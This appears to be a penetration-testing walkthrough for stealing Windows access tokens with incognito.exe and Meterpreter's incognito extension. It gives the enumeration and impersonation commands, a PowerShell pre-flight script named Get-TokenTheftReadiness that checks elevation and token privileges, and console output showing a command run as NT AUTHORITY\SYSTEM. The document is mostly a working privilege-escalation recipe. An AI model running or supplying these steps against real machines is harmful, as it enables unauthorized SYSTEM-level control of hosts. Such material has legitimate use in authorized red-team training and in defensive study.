Prerequisite: the account you obtained is a local administrator and your shell already runs with the elevated (past UAC, high-integrity) token. A UAC-filtered administrator token does not let you open other users' processes, so incognito will see far fewer tokens.
# List the user tokens available from this process
incognito.exe list_tokens -u
# Run a command under a stolen token (execute -c needs a delegation token for that user)
incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd
# Same attack from a Meterpreter session: load incognito, then steal the token
load incognito                          # load the incognito extension
list_tokens -u                          # enumerate tokens by user
impersonate_token "NT AUTHORITY\\SYSTEM" # impersonate the stolen token (the backslash is doubled in the Meterpreter console)
rev2self or drop_token                  # revert to the original token
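Before running incognito it is worth confirming the prerequisite stated at the top: that the shell is actually elevated and that the token-related privileges are present. The PowerShell script below is an added example written for this note, not code from the original page or from the incognito/Metasploit projects. It assumes the CSV output format of `whoami /priv /fo csv` and `whoami /groups /fo csv`, and the function name `Get-TokenTheftReadiness` is chosen here.

```powershell
# Added example (not part of incognito or Metasploit): pre-flight check run in the
# same session in which incognito.exe will be launched.

function Get-TokenTheftReadiness {
    [CmdletBinding()]
    param()

    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)

    # IsInRole(Administrator) is only $true when the process holds the elevated
    # (high-integrity) token; a UAC-filtered admin token answers $false.
    $isElevatedAdmin = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
    $isSystem        = $identity.IsSystem

    # Integrity level from the token's group list (the "Mandatory Label\..." entry).
    $groups    = whoami /groups /fo csv | ConvertFrom-Csv
    $integrity = ($groups | Where-Object { $_.'Group Name' -like 'Mandatory Label\*' }).'Group Name'

    # Privileges that matter for stealing and using tokens:
    #   SeDebugPrivilege              - open other users' processes to reach their tokens
    #   SeImpersonatePrivilege        - impersonate a duplicated token (impersonate_token / execute)
    #   SeAssignPrimaryTokenPrivilege - hand a stolen token to a new process as its primary token
    # State 'Disabled' means the privilege is in the token and can be enabled by the
    # process (AdjustTokenPrivileges); 'Absent' means it is not in the token at all.
    $wanted    = 'SeDebugPrivilege', 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
    $privs     = whoami /priv /fo csv | ConvertFrom-Csv
    $privState = @{}
    foreach ($name in $wanted) {
        $row = $privs | Where-Object { $_.'Privilege Name' -eq $name }
        $privState[$name] = if ($row) { $row.State } else { 'Absent' }
    }

    [pscustomobject]@{
        User              = $identity.Name
        IsSystem          = $isSystem           # incognito's "Not running as SYSTEM" warning is expected when $false
        IsElevatedAdmin   = $isElevatedAdmin
        IntegrityLevel    = $integrity
        Privileges        = $privState
        ReadyForIncognito = $isElevatedAdmin -and ($privState['SeImpersonatePrivilege'] -ne 'Absent')
    }
}

$status = Get-TokenTheftReadiness
$status | Format-List

if (-not $status.IsElevatedAdmin) {
    Write-Warning "Shell is not elevated past UAC: incognito will not be able to reach other users' tokens. Re-launch elevated first."
}
if ($status.Privileges['SeDebugPrivilege'] -eq 'Absent') {
    Write-Warning 'SeDebugPrivilege is not in this token; expect an incomplete token list.'
}
```

Run it from the shell you intend to use for incognito: the interesting fields are IsElevatedAdmin (the prerequisite above) and the state of SeImpersonatePrivilege and SeDebugPrivilege, which correspond to the "Administrative Privileges Available" block in the listing that follows.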
# Enumerate tokens
C:\Users\Administrator\Desktop>incognito.exe list_tokens -u
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found
Delegation Tokens Available
============================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
YU\Administrator
Impersonation Tokens Available
============================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Window Manager\DWM-1
Administrative Privileges Available
============================================
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeRelabelPrivilege
SeLoadDriverPrivilege
# Run a command under the stolen SYSTEM token
C:\Users\Administrator\Desktop>incognito.exe execute -c "NT AUTHORITY\SYSTEM" whoami
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[+] Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
nt authority\system